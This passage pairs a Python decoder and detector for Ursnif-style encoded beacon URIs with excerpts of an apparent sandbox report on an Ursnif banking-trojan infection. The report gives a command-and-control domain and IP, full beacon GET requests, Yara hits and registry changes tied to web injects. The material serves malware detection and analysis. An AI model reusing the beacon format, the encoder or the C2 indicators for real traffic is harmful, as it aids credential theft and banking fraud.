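REPORT_PATH = ("/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/"
               "hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/"
               "EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/"
               "5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/"
               "auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/"
               "xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e")

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def encode_ursnif_uri(data: bytes, seg_len: int = 11) -> str:
    """Forward direction (an assumption about the bot's scheme, used here for a round-trip
    test): base64 -> percent-encode '+', '/', '=' -> replace '%' with '_' -> insert '/'
    every seg_len characters. Real traffic uses irregular segment lengths."""
    b64 = base64.b64encode(data).decode("ascii")
    s = b64.replace("+", "_2B").replace("/", "_2F").replace("=", "_3D")
    return "/" + "/".join(s[i:i + seg_len] for i in range(0, len(s), seg_len))


def ursnif_uri_to_b64(path: str) -> str:
    """Reverse the scheme. Slashes are removed *before* the _XX substitution so an escape
    split by a separator (e.g. 'Tm_/2BJV') is still recognised."""
    joined = path.replace("/", "")
    return re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), joined)


def ursnif_uri_to_bytes(path: str) -> bytes:
    """Base64-decode the normalised path, re-adding any padding the sender stripped.
    The result is the encrypted request body; decryption is out of scope here."""
    b64 = ursnif_uri_to_b64(path)
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64, validate=True)


def looks_like_ursnif_beacon(path: str, min_len: int = 64, min_segments: int = 4) -> bool:
    """Structural check in the spirit of the ET 'URI Struct M1/M2' rules: a long path of
    many extension-less segments, containing the _2B/_2F escapes, whose normalised form
    is pure base64. Tune min_len/min_segments against your own HTTP logs."""
    segments = [s for s in path.split("/") if s]
    joined = "".join(segments)
    if len(joined) < min_len or len(segments) < min_segments:
        return False
    if "_2B" not in joined and "_2F" not in joined:
        return False
    if any("." in s or "=" in s or "?" in s for s in segments):
        return False
    return B64_ALPHABET.match(ursnif_uri_to_b64(path)) is not None


if __name__ == "__main__":
    print(looks_like_ursnif_beacon(REPORT_PATH))
    print(ursnif_uri_to_b64(REPORT_PATH)[:48] + "...")
```

Run over a proxy log, `looks_like_ursnif_beacon` is a triage filter rather than a signature: it will also flag other base64-in-path schemes that use the same `_` for `%` trick, so pair it with the destination host and the User-Agent seen above before acting on a hit.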
Source: Joe Sandbox View | ASN Name: SPRINTHOSTRU
Source: Joe Sandbox View | IP Address: 185.251.90.253
Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P
Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/t
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m5
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | DNS traffic detected: queries for: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E5725F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E57E30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E51754
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05593570
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05575C88
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055710E6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055790A1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05587B5D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05584B1F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055843B9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557FBA9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557423D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558DAED
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055952A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FB948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FB230
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F06B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F6EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E6684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D76F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F5ED8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EC6C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E2EC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F2EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E559C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E1DF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F4DE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E5DBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D3610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D74A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E4484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E9500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D4B60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F4354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E8340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FA3A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F4BA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3DABDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F9408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F3400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EBA74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D9AD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3ED328
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F730C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F5164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E1164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E4150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D2138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EA9F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E70C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F88B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E0124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D90FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F404796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EF7B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EA790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E7820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D1000
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DB948
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE95C
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DB230
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D3400
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B1000
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C7820
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D88B8
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C70C8
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B90FC
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C0124
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B2138
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C6944
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C4150
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C1164
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D5164
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CA9F8
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CBA74
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B9AD8
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D730C
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CD328
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B1348